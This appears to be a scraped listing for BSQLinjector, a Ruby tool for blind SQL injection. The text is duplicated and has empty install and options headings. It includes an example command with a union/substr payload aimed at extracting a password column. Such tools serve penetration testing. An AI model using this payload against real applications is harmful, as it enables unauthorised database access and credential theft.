BSQLinjector - Blind SQL Injection Exploit tool
BSQLinjector:
BSQLinjector uses blind method to retrieve data from SQL databases. I recommend using "--test" switch to clearly see how configured payload looks like before sending it to an application.
Options:
Install on Linux:
Install on Windows:
Install Ruby from Ruby-lang.org
Install Git from Git-scm.com
Open Command Prompt as Administrator and enter the following commands:
Example usage:
ruby ./BSQLinjector.rb --pattern=truestatement --file=/tmp/req.txt --schar="'" --prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password," --append="'#" --ssl
BSQLinjector uses blind method to retrieve data from SQL databases. I recommend using "--test" switch to clearly see how configured payload looks like before sending it to an application.
Options:
Install on Linux:
Install on Windows:
Install Ruby from Ruby-lang.org
Install Git from Git-scm.com
Open Command Prompt as Administrator and enter the following commands:
Example usage:
ruby ./BSQLinjector.rb --pattern=truestatement --file=/tmp/req.txt --schar="'" --prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password," --append="'#" --ssl
